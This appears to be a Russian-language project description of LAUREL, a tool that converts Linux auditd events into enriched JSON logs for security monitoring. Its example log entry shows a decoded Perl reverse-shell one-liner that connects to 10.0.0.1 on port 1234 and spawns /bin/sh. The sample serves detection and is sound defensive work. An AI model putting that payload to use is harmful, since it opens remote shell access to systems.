
Преобразование журналов аудита Linux для использования в SIEM
LAUREL — это плагин постобработки событий для auditd(8), который создаёт полезные, обогащённые журналы аудита в формате JSON, подходящие для современных систем мониторинга безопасности.
Документацию, соответствующую последнему стабильному релизу, можно найти здесь.
TLDR: Вместо событий аудита, которые выглядят так…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
…LAUREL превращает их в JSON-логи, где беспорядок, который пытаются устроить атакующие/пентестеры/красные команды, становится очевидным с первого взгляда:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}
Это происходит на источнике, потому что LAUREL работает на хосте, где генерируются события аудита. События обогащаются полезной информацией о родительском процессе (ppid):
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
Детали конфигурации и эксплуатации описаны на странице руководства laurel(8). Подробности о формате логов и обосновании можно найти на странице руководства laurel-about(7). Страница laurel-audit-rules(7) содержит советы и примеры по настройке правил аудита, полезных для обнаружения тактик атакующих.
Инструкции по установке LAUREL содержат указания по сборке LAUREL из исходного кода, а также по его установке и настройке.
Мы разработали LAUREL, потому что нас не устраивали наборы функций и производительность существующих проектов и продуктов. Пожалуйста, обратитесь к документу Производительность за подробностями.
GNU General Public License, version 3
Логотип создан Birgit Meyer <[email protected]>.